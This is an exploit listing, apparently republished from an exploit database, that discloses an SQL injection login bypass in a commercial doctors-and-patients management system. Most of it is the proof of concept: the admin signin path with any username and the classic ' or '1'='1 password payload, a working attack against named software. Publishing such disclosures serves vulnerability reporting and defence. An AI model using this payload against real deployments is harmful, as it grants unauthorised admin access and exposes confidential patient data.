# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass) # Date: 06/30/2021 # Exploit Author: Murat DEMIRCI (butterflyhunt3r) # Vendor Homepage: https://www.codester.com/ # Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system # Version: 1.0 # Tested on: Windows 10 # Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication. # Proof of Concept : http://test.com/PATH/signin # Username : anything # Password : ' or '1'='1
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
